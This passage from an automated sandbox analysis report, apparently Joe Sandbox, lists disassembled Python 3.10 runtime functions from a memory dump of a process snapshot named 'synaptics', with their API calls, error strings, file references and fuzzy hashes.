                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatMemoryReadyUnicode_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\unicodeobject.c
                                                                                                                                                                                                      • API String ID: 2213765942-1534905068
                                                                                                                                                                                                      • Opcode ID: ca0a00b1ab350ecd52cf4cff103e07b1d3ba8f9da869beeb4b2defdfa83f1b18
                                                                                                                                                                                                      • Instruction ID: f7f06a85e53962e6334ceb6a4f4fce49d9e279ab07cb7e0600c4f27979780f15
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca0a00b1ab350ecd52cf4cff103e07b1d3ba8f9da869beeb4b2defdfa83f1b18
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E048B570020C67DF01EFB5DC12D5637B96B4565AB058454F95C97B01DA31F92047A1
                                                                                                                                                                                                      Function 6C4E1C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_EncodeCharmap.PYTHON310(?,?,00000000), ref: 6C4E1CAD
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation), ref: 6C4E1CC8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C4E1CBC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharmapEncodeErr_StringUnicode_
                                                                                                                                                                                                      • String ID: bad argument type for built-in operation
                                                                                                                                                                                                      • API String ID: 4245071049-2291703510
                                                                                                                                                                                                      • Opcode ID: 0867182b339b2f6c5951085de14d3ef16360c7d9482257ff51de4f53c36ddbac
                                                                                                                                                                                                      • Instruction ID: 6577cb2cbf72efcc9082a42a439f927c7cc944dcaaee64b11b74505c80236b24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0867182b339b2f6c5951085de14d3ef16360c7d9482257ff51de4f53c36ddbac
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35E04F71740308AFDB10DB64ED01F6A73AC9B9954EF444414BC0CD7B92D626E594C6A1
                                                                                                                                                                                                      Function 6C4B0D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @Btl$P5tl
                                                                                                                                                                                                      • API String ID: 0-3867793852
                                                                                                                                                                                                      • Opcode ID: 9c9f952e5d44607717769834d6f5d4dbb33111c8c1a792aee4a3c51a0c14682b
                                                                                                                                                                                                      • Instruction ID: e57f6716e6c2f782d382c27384e446ef1f6fc6aac91b62b57266fdfba014c168
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c9f952e5d44607717769834d6f5d4dbb33111c8c1a792aee4a3c51a0c14682b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE026B25002242B0610C96DA900EAEF36E8E4133A729C316F83CB3FD0DB30FC8281E1
                                                                                                                                                                                                      Function 6C475E30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000B3B), ref: 6C475E6A
                                                                                                                                                                                                        • Part of subcall function 6C474EC0: PyList_New.PYTHON310(?), ref: 6C474EDA
                                                                                                                                                                                                        • Part of subcall function 6C474EC0: PyList_New.PYTHON310(?), ref: 6C474FEA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C475E59
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C475E5E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: List_$Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 817396481-1848062838
                                                                                                                                                                                                      • Opcode ID: 57a77ccfd47e9a9e63c1efd2f3da34c612b0c9173592e264c77814eaa51ee60f
                                                                                                                                                                                                      • Instruction ID: 5cd44cc22f128bad9a0d7cd182552213f1cc67e893a3cf9c99074e16c362febf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57a77ccfd47e9a9e63c1efd2f3da34c612b0c9173592e264c77814eaa51ee60f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33E0267230D204AFEF18EBE1AC42F9637A99B4165AF10045CF11C8AF52DB22E401DAF4
                                                                                                                                                                                                      Function 6C48FFF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,000009E1), ref: 6C49002D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C490021
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C49001C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c
                                                                                                                                                                                                      • API String ID: 376477240-1334166624
                                                                                                                                                                                                      • Opcode ID: e7e9150dd9fceb16459162fda5751b5409a4edcad0e2c0004b24d3b2789a6d2d
                                                                                                                                                                                                      • Instruction ID: 5038766dbe40e6516f59e805475d99fa8f83d08728534b312cb76ff27cc14341
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7e9150dd9fceb16459162fda5751b5409a4edcad0e2c0004b24d3b2789a6d2d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9E0DF31300208EBDA00DE54D882F26B7B5AB4920AB108498A50C4BA53CB33EC13EB90
                                                                                                                                                                                                      Function 6C551C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,?,?), ref: 6C551C3A
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(codec must pass exception instance), ref: 6C551C51
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • codec must pass exception instance, xrefs: 6C551C46
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: codec must pass exception instance
                                                                                                                                                                                                      • API String ID: 1622067708-3174393782
                                                                                                                                                                                                      • Opcode ID: 9c5e5ecd28e7de6f1827e991e66f9400cfcfe2b6678a383c319ea009a07f8c26
                                                                                                                                                                                                      • Instruction ID: 7863465bf07f0eac645cc6fbb0a478eb195254885c944ffa81945fb4455446f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c5e5ecd28e7de6f1827e991e66f9400cfcfe2b6678a383c319ea009a07f8c26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E0C2B1754308AFDB00DAA0FD46A63376D97E060DF908428F80C42F12F722ED64C7A0
                                                                                                                                                                                                      Function 6C48FF20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,000009B6), ref: 6C48FF78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C48FF6C
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C48FF67
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c
                                                                                                                                                                                                      • API String ID: 376477240-1334166624
                                                                                                                                                                                                      • Opcode ID: 8dff7f5f50355f5728d1a62abd75f8145ec9529239872f21c727c08e1d05df5d
                                                                                                                                                                                                      • Instruction ID: 3ce497fac2a48c23e89061fe900f328fd0335a75c325918c0d4035bb7753aa17
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dff7f5f50355f5728d1a62abd75f8145ec9529239872f21c727c08e1d05df5d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DE02630703304A7FA00EA648D42F1A37650B4675AF004518B62C5AAD6CF30E405A790
                                                                                                                                                                                                      Function 6C4A29B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_Repr.PYTHON310(?), ref: 6C4A29B9
                                                                                                                                                                                                        • Part of subcall function 6C4A2710: GetCurrentThreadId.KERNEL32 ref: 6C4A2735
                                                                                                                                                                                                        • Part of subcall function 6C4A2710: _PyErr_CheckSignalsTstate.PYTHON310(?,?,6C4B758E,?), ref: 6C4A274C
                                                                                                                                                                                                        • Part of subcall function 6C4A2710: PyOS_CheckStack.PYTHON310(?,6C4B758E,?), ref: 6C4A2758
                                                                                                                                                                                                        • Part of subcall function 6C4A2710: _PyErr_SetString.PYTHON310(00000000,6C73C4C8,stack overflow,?,6C4B758E,?), ref: 6C4A2778
                                                                                                                                                                                                      • _PyUnicode_AsASCIIString.PYTHON310(00000000,backslashreplace), ref: 6C4A29D3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CheckErr_String$CurrentObject_ReprSignalsStackThreadTstateUnicode_
                                                                                                                                                                                                      • String ID: backslashreplace
                                                                                                                                                                                                      • API String ID: 25347351-3707188517
                                                                                                                                                                                                      • Opcode ID: 42bfe2477fbd1ce236bcce1f8277c53a7dff3a6189f1898395c1056c2658b1fd
                                                                                                                                                                                                      • Instruction ID: e435a7e0ccfc73afa1a49e5a3dd4fee199fdb97cc0656406c8b2d93a18c787d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42bfe2477fbd1ce236bcce1f8277c53a7dff3a6189f1898395c1056c2658b1fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D02B3150675436D23091A3AD0DF873A98CF4167CF010539FD0C71F19DB45A90640D4
                                                                                                                                                                                                      Function 6C475BC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000B1D), ref: 6C475BF6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C475BE5
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C475BEA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 376477240-1848062838
                                                                                                                                                                                                      • Opcode ID: 128c5a4566ded60128c461726aff88052673cc62984dc0d346e69cd8103a36ba
                                                                                                                                                                                                      • Instruction ID: 1bf4d0d409b0b3fe9bf7f92f0744a80a0ef329593a1f15575e0f63d31d3f4740
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 128c5a4566ded60128c461726aff88052673cc62984dc0d346e69cd8103a36ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FE0263130030CABEB00CBA9CC81F913BA86B45329F140250F02C8BAE2CB34E801DFA0
                                                                                                                                                                                                      Function 6C58FED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyCrossInterpreterData_Lookup.PYTHON310(?), ref: 6C58FED6
                                                                                                                                                                                                        • Part of subcall function 6C590190: _PyErr_SetString.PYTHON310(?,null argument to internal routine,?,?,?,6C58FEDB,?), ref: 6C5901B5
                                                                                                                                                                                                        • Part of subcall function 6C590190: PyThread_acquire_lock_timed.PYTHON310(000000FF,000000FF,00000000,?,?,?,6C58FEDB,?), ref: 6C5901D3
                                                                                                                                                                                                        • Part of subcall function 6C590190: EnterCriticalSection.KERNEL32(?), ref: 6C590223
                                                                                                                                                                                                        • Part of subcall function 6C590190: ReleaseSemaphore.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,6C58FEDB,?), ref: 6C590242
                                                                                                                                                                                                        • Part of subcall function 6C590190: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,6C58FEDB,?), ref: 6C590249
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%S does not support cross-interpreter data,?), ref: 6C58FEFB
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %S does not support cross-interpreter data, xrefs: 6C58FEF0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
